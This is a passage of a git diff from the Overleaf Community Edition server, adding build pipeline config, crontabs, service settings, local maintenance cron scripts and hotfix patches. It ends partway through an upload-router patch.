+ automapSubstitutions: true + - id: prefetch_ce + name: gcr.io/cloud-builders/docker + script: | + #!/usr/bin/env bash + set +e # Ignore pull failures + docker pull ${_IMAGE_TAG_BRANCH} + docker pull ${_IMAGE_TAG_LATEST} + exit 0 + automapSubstitutions: true + waitFor: + - '-' + - id: build_community + name: us-east1-docker.pkg.dev/overleaf-ops/ol-docker/cloud-builder + dir: server-ce + args: + - build-community + waitFor: + # do not wait for prefetch_ce, docker buildx will pull it as needed + - build_base + - id: tag_main_latest + name: gcr.io/cloud-builders/docker + script: | + #!/usr/bin/env bash + set -e + if [ $BRANCH_NAME == main ]; then + docker tag ${_IMAGE_TAG} ${_IMAGE_TAG_LATEST}; + docker push ${_IMAGE_TAG_LATEST}; + fi + automapSubstitutions: true + waitFor: + - build_community +timeout: 3600s +options: + machineType: E2_HIGHCPU_32 + env: + - 'BRANCH_NAME=${BRANCH_NAME}' + # docker build + - 'OVERLEAF_BASE_BRANCH=${_IMAGE_BASE_BRANCH}' + - 'OVERLEAF_BASE_LATEST=${_IMAGE_BASE_LATEST}' + - 'OVERLEAF_BASE_TAG=${_IMAGE_BASE}' + - 'OVERLEAF_BRANCH=${_IMAGE_TAG_BRANCH}' + - 'OVERLEAF_LATEST=${_IMAGE_TAG_LATEST}' + - 'OVERLEAF_TAG=${_IMAGE_TAG}' +images: + - '${_IMAGE_BASE}' + - '${_IMAGE_BASE_BRANCH}' + - '${_IMAGE_TAG}' + - '${_IMAGE_TAG_BRANCH}' +substitutions: + _IMAGE_BASE: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf-base:${BRANCH_NAME}-${SHORT_SHA}_${BUILD_ID}' + _IMAGE_BASE_BRANCH: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf-base:${BRANCH_NAME}' + _IMAGE_BASE_LATEST: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf-base:latest' + _IMAGE_TAG_BRANCH: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf:${BRANCH_NAME}' + _IMAGE_TAG_LATEST: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf:latest' + _IMAGE_TAG: 'us-east1-docker.pkg.dev/overleaf-ops/ol-docker/overleaf:${BRANCH_NAME}-${SHORT_SHA}_${BUILD_ID}' +tags: + - 'overleaf-public' + - '${BRANCH_NAME}' + - '${SHORT_SHA}' diff --git a/server-ce/config/crontab-deletion b/server-ce/config/crontab-deletion new file mode 100644 index 0000000..91a780d --- /dev/null +++ b/server-ce/config/crontab-deletion @@ -0,0 +1,3 @@ +5 * * * * root /overleaf/cron/deactivate-projects.sh >> /var/log/overleaf/cron-deactivate-projects.log 2>&1 +15 * * * * root /overleaf/cron/delete-users.sh >> /var/log/overleaf/cron-delete-users.log 2>&1 +20 * * * * root /overleaf/cron/delete-projects.sh >> /var/log/overleaf/cron-delete-projects.log 2>&1 diff --git a/server-ce/config/crontab-history b/server-ce/config/crontab-history new file mode 100644 index 0000000..cfa12f9 --- /dev/null +++ b/server-ce/config/crontab-history @@ -0,0 +1,3 @@ +*/20 * * * * root /overleaf/cron/project-history-periodic-flush.sh >> /var/log/overleaf/cron-project-history-periodic-flush.log 2>&1 +30 * * * * root /overleaf/cron/project-history-retry-soft.sh >> /var/log/overleaf/project-history-retry-soft.log 2>&1 +45 * * * * root /overleaf/cron/project-history-retry-hard.sh >> /var/log/overleaf/project-history-retry-hard.log 2>&1 diff --git a/server-ce/config/custom-environment-variables.json b/server-ce/config/custom-environment-variables.json new file mode 100644 index 0000000..f65f74a --- /dev/null +++ b/server-ce/config/custom-environment-variables.json @@ -0,0 +1,61 @@ +{ + "databaseUrl": "HISTORY_CONNECTION_STRING", + "databaseUrlReadOnly": "HISTORY_FOLLOWER_CONNECTION_STRING", + "herokuDatabaseUrl": "DATABASE_URL", + "databasePoolMin": "DATABASE_POOL_MIN", + "databasePoolMax": "DATABASE_POOL_MAX", + "persistor": { + "backend": "OVERLEAF_HISTORY_BACKEND", + "s3": { + "key": "OVERLEAF_HISTORY_S3_ACCESS_KEY_ID", + "secret": "OVERLEAF_HISTORY_S3_SECRET_ACCESS_KEY", + "maxRetries": "OVERLEAF_HISTORY_S3_MAX_RETRIES", + "endpoint": "OVERLEAF_HISTORY_S3_ENDPOINT", + "pathStyle": "OVERLEAF_HISTORY_S3_PATH_STYLE", + "region": "OVERLEAF_HISTORY_S3_REGION", + "httpOptions": { + "timeout": "OVERLEAF_HISTORY_S3_TIMEOUT" + } + } + }, + "blobStore": { + "globalBucket": "OVERLEAF_HISTORY_BLOBS_BUCKET", + "projectBucket": "OVERLEAF_HISTORY_PROJECT_BLOBS_BUCKET" + }, + "chunkStore": { + "historyStoreConcurrency": "HISTORY_STORE_CONCURRENCY", + "bucket": "OVERLEAF_HISTORY_CHUNKS_BUCKET" + }, + "zipStore": { + "bucket": "OVERLEAF_HISTORY_ZIPS_BUCKET", + "zipTimeoutMs": "ZIP_STORE_ZIP_TIMEOUT_MS" + }, + "mongo": { + "uri": "OVERLEAF_MONGO_URL" + }, + "basicHttpAuth": { + "password": "STAGING_PASSWORD", + "oldPassword": "BASIC_HTTP_AUTH_OLD_PASSWORD" + }, + "jwtAuth": { + "key": "OT_JWT_AUTH_KEY", + "oldKey": "OT_JWT_AUTH_OLD_KEY", + "algorithm": "OT_JWT_AUTH_ALG" + }, + "clusterWorkers": "CLUSTER_WORKERS", + "maxFileUploadSize": "MAX_FILE_UPLOAD_SIZE", + "httpsOnly": "HTTPS_ONLY", + "httpRequestTimeout": "OVERLEAF_HISTORY_V1_HTTP_REQUEST_TIMEOUT", + "redis": { + "history": { + "host": "OVERLEAF_REDIS_HOST", + "password": "OVERLEAF_REDIS_PASS", + "port": "OVERLEAF_REDIS_PORT" + }, + "lock": { + "host": "OVERLEAF_REDIS_HOST", + "password": "OVERLEAF_REDIS_PASS", + "port": "OVERLEAF_REDIS_PORT" + } + } +} diff --git a/server-ce/config/env.sh b/server-ce/config/env.sh new file mode 100644 index 0000000..b12ca24 --- /dev/null +++ b/server-ce/config/env.sh @@ -0,0 +1,13 @@ +export CHAT_HOST=127.0.0.1 +export CLSI_HOST=127.0.0.1 +export CONTACTS_HOST=127.0.0.1 +export DOCSTORE_HOST=127.0.0.1 +export DOCUMENT_UPDATER_HOST=127.0.0.1 +export DOCUPDATER_HOST=127.0.0.1 +export FILESTORE_HOST=127.0.0.1 +export HISTORY_V1_HOST=127.0.0.1 +export NOTIFICATIONS_HOST=127.0.0.1 +export PROJECT_HISTORY_HOST=127.0.0.1 +export REALTIME_HOST=127.0.0.1 +export WEB_HOST=127.0.0.1 +export WEB_API_HOST=127.0.0.1 diff --git a/server-ce/config/latexmkrc b/server-ce/config/latexmkrc new file mode 100644 index 0000000..5bdc87c --- /dev/null +++ b/server-ce/config/latexmkrc @@ -0,0 +1,3 @@ +# equivalent to -gt option. Used to prevent latexmk from skipping recompilation +# of output.log and output.pdf +$go_mode = 3; diff --git a/server-ce/config/production.json b/server-ce/config/production.json new file mode 100644 index 0000000..f902bea --- /dev/null +++ b/server-ce/config/production.json @@ -0,0 +1,24 @@ +{ + "persistor": { + "backend": "fs", + "useSubdirectories": true + }, + "basicHttpAuth": { + "password": "password" + }, + "useDeleteObjects": "false", + "jwtAuth": { + "algorithm": "HS256" + }, + "mongo": {}, + "blobStore": { + "globalBucket": "/var/lib/overleaf/data/history/overleaf-global-blobs", + "projectBucket": "/var/lib/overleaf/data/history/overleaf-project-blobs" + }, + "chunkStore": { + "bucket": "/var/lib/overleaf/data/history/overleaf-chunks" + }, + "zipStore": { + "bucket": "/var/lib/overleaf/data/history/overleaf-zips" + } +} diff --git a/server-ce/config/settings.js b/server-ce/config/settings.js new file mode 100644 index 0000000..0cf2c5a --- /dev/null +++ b/server-ce/config/settings.js @@ -0,0 +1,473 @@ +/* eslint-disable + camelcase, + no-cond-assign, + no-dupe-keys, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let redisConfig, siteUrl +let e +const Path = require('path') + +// These credentials are used for authenticating api requests +// between services that may need to go over public channels +const httpAuthUser = process.env.WEB_API_USER +const httpAuthPass = process.env.WEB_API_PASSWORD +const httpAuthUsers = {} +if (httpAuthUser && httpAuthPass) { + httpAuthUsers[httpAuthUser] = httpAuthPass +} + +const parse = function (option) { + if (option != null) { + try { + const opt = JSON.parse(option) + return opt + } catch (err) { + throw new Error(`problem parsing ${option}, invalid JSON`) + } + } +} + +const parseIntOrFail = function (value) { + const parsedValue = parseInt(value, 10) + if (isNaN(parsedValue)) { + throw new Error(`'${value}' is an invalid integer`) + } + return parsedValue +} + +const DATA_DIR = '/var/lib/overleaf/data' +const TMP_DIR = '/var/lib/overleaf/tmp' + +const settings = { + clsi: { + optimiseInDocker: process.env.OPTIMISE_PDF === 'true', + }, + + brandPrefix: '', + + allowAnonymousReadAndWriteSharing: + process.env.OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING === 'true', + + // Databases + // --------- + + // Overleaf Community Edition's main persistent data store is MongoDB (http://www.mongodb.org/) + // Documentation about the URL connection string format can be found at: + // + // http://docs.mongodb.org/manual/reference/connection-string/ + // + // The following works out of the box with Mongo's default settings: + mongo: { + url: process.env.OVERLEAF_MONGO_URL || 'mongodb://dockerhost/sharelatex', + }, + + // Redis is used in Overleaf Community Edition for high volume queries, like real-time + // editing, and session management. + // + // The following config will work with Redis's default settings: + redis: { + web: (redisConfig = { + host: process.env.OVERLEAF_REDIS_HOST || 'dockerhost', + port: process.env.OVERLEAF_REDIS_PORT || '6379', + password: process.env.OVERLEAF_REDIS_PASS || undefined, + key_schema: { + // document-updater + blockingKey({ doc_id }) { + return `Blocking:${doc_id}` + }, + docLines({ doc_id }) { + return `doclines:${doc_id}` + }, + docOps({ doc_id }) { + return `DocOps:${doc_id}` + }, + docVersion({ doc_id }) { + return `DocVersion:${doc_id}` + }, + docHash({ doc_id }) { + return `DocHash:${doc_id}` + }, + projectKey({ doc_id }) { + return `ProjectId:${doc_id}` + }, + docsInProject({ project_id }) { + return `DocsIn:${project_id}` + }, + ranges({ doc_id }) { + return `Ranges:${doc_id}` + }, + // document-updater:realtime + pendingUpdates({ doc_id }) { + return `PendingUpdates:${doc_id}` + }, + // document-updater:history + uncompressedHistoryOps({ doc_id }) { + return `UncompressedHistoryOps:${doc_id}` + }, + docsWithHistoryOps({ project_id }) { + return `DocsWithHistoryOps:${project_id}` + }, + // document-updater:lock + blockingKey({ doc_id }) { + return `Blocking:${doc_id}` + }, + // realtime + clientsInProject({ project_id }) { + return `clients_in_project:${project_id}` + }, + connectedUser({ project_id, client_id }) { + return `connected_user:${project_id}:${client_id}` + }, + }, + }), + fairy: redisConfig, + // document-updater + realtime: redisConfig, + documentupdater: redisConfig, + lock: redisConfig, + history: redisConfig, + websessions: redisConfig, + api: redisConfig, + pubsub: redisConfig, + project_history: redisConfig, + + project_history_migration: { + host: redisConfig.host, + port: redisConfig.port, + password: redisConfig.password, + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + key_schema: { + projectHistoryOps({ projectId }) { + return `ProjectHistory:Ops:{${projectId}}` // NOTE: the extra braces are intentional + }, + }, + }, + }, + + // Local disk caching + // ------------------ + path: { + // If we ever need to write something to disk (e.g. incoming requests + // that need processing but may be too big for memory), then write + // them to disk here: + dumpFolder: Path.join(TMP_DIR, 'dumpFolder'), + // Where to write uploads before they are processed + uploadFolder: Path.join(TMP_DIR, 'uploads'), + // Where to write intermediate file for full project history migration + projectHistories: Path.join(TMP_DIR, 'projectHistories'), + // Where to write the project to disk before running LaTeX on it + compilesDir: Path.join(DATA_DIR, 'compiles'), + // Where to cache downloaded URLs for the CLSI + clsiCacheDir: Path.join(DATA_DIR, 'cache'), + // Where to write the output files to disk after running LaTeX + outputDir: Path.join(DATA_DIR, 'output'), + }, + + // Server Config + // ------------- + + // Where your instance of Overleaf Community Edition can be found publicly. This is used + // when emails are sent out and in generated links: + siteUrl: (siteUrl = process.env.OVERLEAF_SITE_URL || 'http://localhost'), + + // Status page URL as displayed on the maintenance/500 pages. + statusPageUrl: process.env.OVERLEAF_STATUS_PAGE_URL, + + // The name this is used to describe your Overleaf Community Edition Installation + appName: process.env.OVERLEAF_APP_NAME || 'Overleaf Community Edition', + + restrictInvitesToExistingAccounts: + process.env.OVERLEAF_RESTRICT_INVITES_TO_EXISTING_ACCOUNTS === 'true', + + nav: { + title: + process.env.OVERLEAF_NAV_TITLE || + process.env.OVERLEAF_APP_NAME || + 'Overleaf Community Edition', + }, + + // The email address which users will be directed to as the main point of + // contact for this installation of Overleaf Community Edition. + adminEmail: process.env.OVERLEAF_ADMIN_EMAIL || 'placeholder@example.com', + + // If provided, a sessionSecret is used to sign cookies so that they cannot be + // spoofed. This is recommended. + security: { + sessionSecret: + process.env.OVERLEAF_SESSION_SECRET || process.env.CRYPTO_RANDOM, + }, + + csp: { + enabled: process.env.OVERLEAF_CSP_ENABLED !== 'false', + }, + + rateLimit: { + subnetRateLimiterDisabled: + process.env.SUBNET_RATE_LIMITER_DISABLED !== 'false', + }, + + // These credentials are used for authenticating api requests + // between services that may need to go over public channels + httpAuthUsers, + + // Should javascript assets be served minified or not. + useMinifiedJs: true, + + // Should static assets be sent with a header to tell the browser to cache + // them. This should be false in development where changes are being made, + // but should be set to true in production. + cacheStaticAssets: true, + + // If you are running Overleaf Community Edition over https, set this to true to send the + // cookie with a secure flag (recommended). + secureCookie: process.env.OVERLEAF_SECURE_COOKIE != null, + + // If you are running Overleaf Community Edition behind a proxy (like Apache, Nginx, etc) + // then set this to true to allow it to correctly detect the forwarded IP + // address and http/https protocol information. + + behindProxy: process.env.OVERLEAF_BEHIND_PROXY || false, + trustedProxyIps: process.env.OVERLEAF_TRUSTED_PROXY_IPS, + + // The amount of time, in milliseconds, until the (rolling) cookie session expires + cookieSessionLength: parseInt( + process.env.OVERLEAF_COOKIE_SESSION_LENGTH || 5 * 24 * 60 * 60 * 1000, // default 5 days + 10 + ), + + redisLockTTLSeconds: parseInt( + process.env.OVERLEAF_REDIS_LOCK_TTL_SECONDS || '60', + 10 + ), + + i18n: { + subdomainLang: { + www: { + lngCode: process.env.OVERLEAF_SITE_LANGUAGE || 'en', + url: siteUrl, + }, + }, + defaultLng: process.env.OVERLEAF_SITE_LANGUAGE || 'en', + }, + + currentImageName: process.env.TEX_LIVE_DOCKER_IMAGE, + + apis: { + web: { + url: 'http://127.0.0.1:3000', + user: httpAuthUser, + pass: httpAuthPass, + }, + project_history: { + sendProjectStructureOps: true, + url: 'http://127.0.0.1:3054', + }, + v1_history: { + url: process.env.V1_HISTORY_URL || 'http://127.0.0.1:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, + requestTimeout: parseInt( + process.env.OVERLEAF_HISTORY_V1_HTTP_REQUEST_TIMEOUT || '300000', // default is 5min + 10 + ), + }, + }, + references: {}, + notifications: undefined, + + defaultFeatures: { + collaborators: -1, + dropbox: true, + versioning: true, + compileTimeout: parseIntOrFail(process.env.COMPILE_TIMEOUT || 180), + compileGroup: 'standard', + trackChanges: true, + references: true, + }, +} + +// # OPTIONAL CONFIGURABLE SETTINGS + +if (process.env.OVERLEAF_LEFT_FOOTER != null) { + try { + settings.nav.left_footer = JSON.parse(process.env.OVERLEAF_LEFT_FOOTER) + } catch (error) { + e = error + console.error('could not parse OVERLEAF_LEFT_FOOTER, not valid JSON') + } +} + +if (process.env.OVERLEAF_RIGHT_FOOTER != null) { + settings.nav.right_footer = process.env.OVERLEAF_RIGHT_FOOTER + try { + settings.nav.right_footer = JSON.parse(process.env.OVERLEAF_RIGHT_FOOTER) + } catch (error1) { + e = error1 + console.error('could not parse OVERLEAF_RIGHT_FOOTER, not valid JSON') + } +} + +if (process.env.OVERLEAF_HEADER_IMAGE_URL != null) { + settings.nav.custom_logo = process.env.OVERLEAF_HEADER_IMAGE_URL +} + +if (process.env.OVERLEAF_HEADER_EXTRAS != null) { + try { + settings.nav.header_extras = JSON.parse(process.env.OVERLEAF_HEADER_EXTRAS) + } catch (error2) { + e = error2 + console.error('could not parse OVERLEAF_HEADER_EXTRAS, not valid JSON') + } +} + +if (process.env.OVERLEAF_LOGIN_SUPPORT_TEXT != null) { + settings.nav.login_support_text = process.env.OVERLEAF_LOGIN_SUPPORT_TEXT +} + +if (process.env.OVERLEAF_LOGIN_SUPPORT_TITLE != null) { + settings.nav.login_support_title = process.env.OVERLEAF_LOGIN_SUPPORT_TITLE +} + +// Sending Email +// ------------- +// +// You must configure a mail server to be able to send invite emails from +// Overleaf Community Edition. The config settings are passed to nodemailer. See the nodemailer +// documentation for available options: +// +// http://www.nodemailer.com/docs/transports + +if (process.env.OVERLEAF_EMAIL_FROM_ADDRESS != null) { + settings.email = { + fromAddress: process.env.OVERLEAF_EMAIL_FROM_ADDRESS, + replyTo: process.env.OVERLEAF_EMAIL_REPLY_TO || '', + driver: process.env.OVERLEAF_EMAIL_DRIVER, + parameters: { + // AWS Creds + AWSAccessKeyID: process.env.OVERLEAF_EMAIL_AWS_SES_ACCESS_KEY_ID, + AWSSecretKey: process.env.OVERLEAF_EMAIL_AWS_SES_SECRET_KEY, + + // SMTP Creds + host: process.env.OVERLEAF_EMAIL_SMTP_HOST, + port: process.env.OVERLEAF_EMAIL_SMTP_PORT, + secure: parse(process.env.OVERLEAF_EMAIL_SMTP_SECURE), + ignoreTLS: parse(process.env.OVERLEAF_EMAIL_SMTP_IGNORE_TLS), + name: process.env.OVERLEAF_EMAIL_SMTP_NAME, + logger: process.env.OVERLEAF_EMAIL_SMTP_LOGGER === 'true', + }, + + textEncoding: process.env.OVERLEAF_EMAIL_TEXT_ENCODING, + template: { + customFooter: process.env.OVERLEAF_CUSTOM_EMAIL_FOOTER, + }, + } + + if (process.env.OVERLEAF_EMAIL_AWS_SES_REGION != null) { + settings.email.parameters.region = process.env.OVERLEAF_EMAIL_AWS_SES_REGION + } + + if ( + process.env.OVERLEAF_EMAIL_SMTP_USER != null || + process.env.OVERLEAF_EMAIL_SMTP_PASS != null + ) { + settings.email.parameters.auth = { + user: process.env.OVERLEAF_EMAIL_SMTP_USER, + pass: process.env.OVERLEAF_EMAIL_SMTP_PASS, + } + } + + if (process.env.OVERLEAF_EMAIL_SMTP_TLS_REJECT_UNAUTH != null) { + settings.email.parameters.tls = { + rejectUnauthorized: parse( + process.env.OVERLEAF_EMAIL_SMTP_TLS_REJECT_UNAUTH + ), + } + } +} + +// i18n +if (process.env.OVERLEAF_LANG_DOMAIN_MAPPING != null) { + settings.i18n.subdomainLang = parse(process.env.OVERLEAF_LANG_DOMAIN_MAPPING) +} + +// Password Settings +// ----------- +// These restrict the passwords users can use when registering +// opts are from http://antelle.github.io/passfield +if ( + process.env.OVERLEAF_PASSWORD_VALIDATION_PATTERN || + process.env.OVERLEAF_PASSWORD_VALIDATION_MIN_LENGTH || + process.env.OVERLEAF_PASSWORD_VALIDATION_MAX_LENGTH +) { + settings.passwordStrengthOptions = { + pattern: process.env.OVERLEAF_PASSWORD_VALIDATION_PATTERN || 'aA$3', + length: { + min: process.env.OVERLEAF_PASSWORD_VALIDATION_MIN_LENGTH || 8, + max: process.env.OVERLEAF_PASSWORD_VALIDATION_MAX_LENGTH || 72, + }, + } +} + +// /References +// ----------- +if (process.env.OVERLEAF_ELASTICSEARCH_URL != null) { + settings.references.elasticsearch = { + host: process.env.OVERLEAF_ELASTICSEARCH_URL, + } +} + +// filestore +switch (process.env.OVERLEAF_FILESTORE_BACKEND) { + case 's3': + settings.filestore = { + backend: 's3', + stores: { + user_files: process.env.OVERLEAF_FILESTORE_USER_FILES_BUCKET_NAME, + template_files: + process.env.OVERLEAF_FILESTORE_TEMPLATE_FILES_BUCKET_NAME, + }, + s3: { + key: + process.env.OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID || + process.env.AWS_ACCESS_KEY_ID, + secret: + process.env.OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY || + process.env.AWS_SECRET_ACCESS_KEY, + endpoint: process.env.OVERLEAF_FILESTORE_S3_ENDPOINT, + pathStyle: process.env.OVERLEAF_FILESTORE_S3_PATH_STYLE === 'true', + region: + process.env.OVERLEAF_FILESTORE_S3_REGION || + process.env.AWS_DEFAULT_REGION, + }, + } + break + default: + settings.filestore = { + backend: 'fs', + stores: { + user_files: Path.join(DATA_DIR, 'user_files'), + template_files: Path.join(DATA_DIR, 'template_files'), + }, + } +} + +// With lots of incoming and outgoing HTTP connections to different services, +// sometimes long running, it is a good idea to increase the default number +// of sockets that Node will hold open. +const http = require('http') +http.globalAgent.maxSockets = 300 +const https = require('https') +https.globalAgent.maxSockets = 300 + +module.exports = settings diff --git a/server-ce/cron/deactivate-projects.sh b/server-ce/cron/deactivate-projects.sh new file mode 100755 index 0000000..fab0fbf --- /dev/null +++ b/server-ce/cron/deactivate-projects.sh @@ -0,0 +1,28 @@ +#!/usr/bin/env bash + +set -eux + +echo "-------------------------" +echo "Deactivating old projects" +echo "-------------------------" +date + +ENABLE_CRON_RESOURCE_DELETION=$(cat /etc/container_environment/ENABLE_CRON_RESOURCE_DELETION) + +if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + echo "Skipping old project deactivation due to ENABLE_CRON_RESOURCE_DELETION not set to true" + exit 0 +fi + +WEB_URL='http://127.0.0.1:3000' + +USER=$(cat /etc/container_environment/WEB_API_USER) +PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) + +curl -v -X POST \ + -u "${USER}:${PASS}" \ + -H "Content-Type: application/json" \ + -d '{"numberOfProjectsToArchive":"720","ageOfProjects":"7"}' \ + "${WEB_URL}/internal/deactivateOldProjects" + +echo "Done." diff --git a/server-ce/cron/delete-projects.sh b/server-ce/cron/delete-projects.sh new file mode 100755 index 0000000..e1ea5ac --- /dev/null +++ b/server-ce/cron/delete-projects.sh @@ -0,0 +1,25 @@ +#!/usr/bin/env bash + +set -eux + +echo "-------------------------" +echo "Expiring deleted projects" +echo "-------------------------" +date + +ENABLE_CRON_RESOURCE_DELETION=$(cat /etc/container_environment/ENABLE_CRON_RESOURCE_DELETION) + +if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + echo "Skipping project expiration due to ENABLE_CRON_RESOURCE_DELETION not set to true" + exit 0 +fi + +WEB_URL='http://127.0.0.1:3000' + +USER=$(cat /etc/container_environment/WEB_API_USER) +PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) + +curl -X POST -v -u "${USER}:${PASS}" \ + "${WEB_URL}/internal/expire-deleted-projects-after-duration" + +echo "Done." diff --git a/server-ce/cron/delete-users.sh b/server-ce/cron/delete-users.sh new file mode 100755 index 0000000..fe97bff --- /dev/null +++ b/server-ce/cron/delete-users.sh @@ -0,0 +1,25 @@ +#!/usr/bin/env bash + +set -eux + +echo "----------------------" +echo "Expiring deleted users" +echo "----------------------" +date + +ENABLE_CRON_RESOURCE_DELETION=$(cat /etc/container_environment/ENABLE_CRON_RESOURCE_DELETION) + +if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + echo "Skipping user expiration due to ENABLE_CRON_RESOURCE_DELETION not set to true" + exit 0 +fi + +WEB_URL='http://127.0.0.1:3000' + +USER=$(cat /etc/container_environment/WEB_API_USER) +PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) + +curl -X POST -v -u "${USER}:${PASS}" \ + "${WEB_URL}/internal/expire-deleted-users-after-duration" + +echo "Done." diff --git a/server-ce/cron/project-history-periodic-flush.sh b/server-ce/cron/project-history-periodic-flush.sh new file mode 100755 index 0000000..76feae4 --- /dev/null +++ b/server-ce/cron/project-history-periodic-flush.sh @@ -0,0 +1,12 @@ +#!/usr/bin/env bash + +set -eux + +echo "--------------------------" +echo "Flush project-history queue" +echo "--------------------------" +date + +PROJECT_HISTORY_URL='http://127.0.0.1:3054' + +curl -X POST "${PROJECT_HISTORY_URL}/flush/old?timeout=3600000&limit=5000&background=1" diff --git a/server-ce/cron/project-history-retry-hard.sh b/server-ce/cron/project-history-retry-hard.sh new file mode 100755 index 0000000..651a661 --- /dev/null +++ b/server-ce/cron/project-history-retry-hard.sh @@ -0,0 +1,12 @@ +#!/usr/bin/env bash + +set -eux + +echo "-----------------------------------" +echo "Retry project-history errors (hard)" +echo "-----------------------------------" +date + +PROJECT_HISTORY_URL='http://127.0.0.1:3054' + +curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" diff --git a/server-ce/cron/project-history-retry-soft.sh b/server-ce/cron/project-history-retry-soft.sh new file mode 100755 index 0000000..70c5970 --- /dev/null +++ b/server-ce/cron/project-history-retry-soft.sh @@ -0,0 +1,11 @@ +#!/usr/bin/env bash + +set -eux + +echo "-----------------------------------" +echo "Retry project-history errors (soft)" +echo "-----------------------------------" + +PROJECT_HISTORY_URL='http://127.0.0.1:3054' + +curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/genScript.js b/server-ce/genScript.js new file mode 100644 index 0000000..c433f3a --- /dev/null +++ b/server-ce/genScript.js @@ -0,0 +1,42 @@ +const services = require('./services') + +console.log('#!/bin/bash') +console.log('set -ex') + +switch (process.argv.pop()) { + case 'install': + console.log('npm install --omit=dev') + break + case 'compile': + for (const service of services) { + console.log('pushd', `services/${service.name}`) + switch (service.name) { + case 'web': + // precompile pug in background + console.log('npm run precompile-pug &') + console.log('pug_precompile=$!') + + // Avoid downloading of cypress + console.log('export CYPRESS_INSTALL_BINARY=0') + + // install webpack and frontend dependencies + console.log('npm install --include=dev') + // run webpack + console.log('npm run webpack:production') + // uninstall webpack and frontend dependencies + console.log('npm install --omit=dev') + + // Wait for pug precompile to finish + console.log('wait "$pug_precompile"') + break + default: + console.log(`echo ${service.name} does not require a compilation`) + } + console.log('popd') + } + break + default: + console.error('unknown command') + console.log('exit 101') + process.exit(101) +} diff --git a/server-ce/hotfix/2.0.1/Dockerfile b/server-ce/hotfix/2.0.1/Dockerfile new file mode 100644 index 0000000..12a8537 --- /dev/null +++ b/server-ce/hotfix/2.0.1/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:2.0.0 + + +# Patch 1: Fixes project deletion (https://github.com/overleaf/overleaf/issues/644) +ADD disable_project_history.patch /etc/sharelatex/disable_project_history.patch +RUN cd /etc/sharelatex && \ + patch < disable_project_history.patch + + +# Patch 2: Fixes admin creation via CLI (https://github.com/overleaf/overleaf/issues/647) +ADD create_and_destroy_users.patch /var/www/sharelatex/tasks/create_and_destroy_users.patch +RUN cd /var/www/sharelatex/tasks/ && \ + patch < create_and_destroy_users.patch diff --git a/server-ce/hotfix/2.0.1/create_and_destroy_users.patch b/server-ce/hotfix/2.0.1/create_and_destroy_users.patch new file mode 100644 index 0000000..bb2dc16 --- /dev/null +++ b/server-ce/hotfix/2.0.1/create_and_destroy_users.patch @@ -0,0 +1,11 @@ +--- CreateAndDestoryUsers.coffee ++++ CreateAndDestoryUsers.coffee +@@ -21,7 +21,7 @@ module.exports = (grunt) -> + user.save (error) -> + throw error if error? + ONE_WEEK = 7 * 24 * 60 * 60 # seconds +- OneTimeTokenHandler.getNewToken user._id, { expiresIn: ONE_WEEK }, (err, token)-> ++ OneTimeTokenHandler.getNewToken "password", { expiresIn: ONE_WEEK, email:user.email, user_id: user._id.toString() }, (err, token)-> + return next(err) if err? + + console.log "" diff --git a/server-ce/hotfix/2.0.1/disable_project_history.patch b/server-ce/hotfix/2.0.1/disable_project_history.patch new file mode 100644 index 0000000..830570a --- /dev/null +++ b/server-ce/hotfix/2.0.1/disable_project_history.patch @@ -0,0 +1,11 @@ +--- settings.coffee ++++ settings.coffee +@@ -200,6 +200,8 @@ settings = + # is not available + v1: + url: "" ++ project_history: ++ enabled: false + references:{} + notifications:undefined + diff --git a/server-ce/hotfix/2.0.2/1-anon-upload.patch b/server-ce/hotfix/2.0.2/1-anon-upload.patch new file mode 100644 index 0000000..7503790 --- /dev/null +++ b/server-ce/hotfix/2.0.2/1-anon-upload.patch @@ -0,0 +1,60 @@ +--- UploadsRouter.js ++++ UploadsRouter.js +@@ -1,13 +1,3 @@ +-/* eslint-disable +- no-unused-vars, +-*/ +-// TODO: This file was created by bulk-decaffeinate. +-// Fix any style issues and re-enable lint. +-/* +- * decaffeinate suggestions: +- * DS102: Remove unnecessary code created because of implicit returns +- * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md +- */ + const AuthorizationMiddleware = require('../Authorization/AuthorizationMiddleware') + const AuthenticationController = require('../Authentication/AuthenticationController') + const ProjectUploadController = require('./ProjectUploadController') +@@ -28,18 +18,30 @@ module.exports = { + ProjectUploadController.uploadProject + ) + +- return webRouter.post( +- '/Project/:Project_id/upload', +- RateLimiterMiddleware.rateLimit({ +- endpointName: 'file-upload', +- params: ['Project_id'], +- maxRequests: 200, +- timeInterval: 60 * 30 +- }), +- AuthenticationController.requireLogin(), +- AuthorizationMiddleware.ensureUserCanWriteProjectContent, +- ProjectUploadController.multerMiddleware, +- ProjectUploadController.uploadFile +- ) ++ const fileUploadEndpoint = '/Project/:Project_id/upload' ++ const fileUploadRateLimit = RateLimiterMiddleware.rateLimit({ ++ endpointName: 'file-upload', ++ params: ['Project_id'], ++ maxRequests: 200, ++ timeInterval: 60 * 30 ++ }) ++ if 